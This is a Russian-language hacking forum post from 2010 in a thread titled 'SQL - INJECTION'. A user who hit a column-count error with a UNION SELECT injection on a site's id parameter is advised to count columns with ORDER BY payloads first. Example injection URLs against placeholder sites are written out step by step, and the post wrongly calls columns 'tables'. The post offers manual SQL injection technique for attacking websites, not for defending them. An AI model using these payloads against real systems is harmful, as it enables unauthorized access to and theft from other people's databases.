Тема: SQL - INJECTION
Показать сообщение отдельно

  #9  
Старый 10.02.2010, 01:00
Jmylia
Познающий
Регистрация: 17.07.2009
Сообщений: 36
С нами: 8852726

Репутация: -3
По умолчанию

Цитата:


>The used SELECT statements have a different number of columns

Это вылезает вместо просмотра таблиц БД юзера

http://sitename.net/showsoft.php?id=...ion+select+1/*

Чооооооо делать, не подскажете?))))
================================================== ========



Если я в этом что и рублю то, вы неправильно опеределили количество таблиц(одной быть походу не может)

Сначала нужно узнать количество а уже потом просматривать версию БД и т.д.

Сначала узнайте количество таблиц при помощи команды order+by:

Цитата:


Следующим шагом нам необходимо узнать количество таблиц. Это делается при помощи команды order+by
http://site.com/main.php?id=12+order+by+1/* - при введении этой команды ошибка должна исчезнуть потомучто количество таблиц больше чем 1...
http://site.com/main.php?id=12+order+by+10000/* - ошибка появляется вновь потомучто количество таблиц меньше чем 10000
http://site.com/main.php?id=12+order+by+10/* - ошибка исчезла а при введении http://site.com/main.php?id=12+order+by+11/* появилась, из этого следует что количество таблиц 10.
 
Ответить с цитированием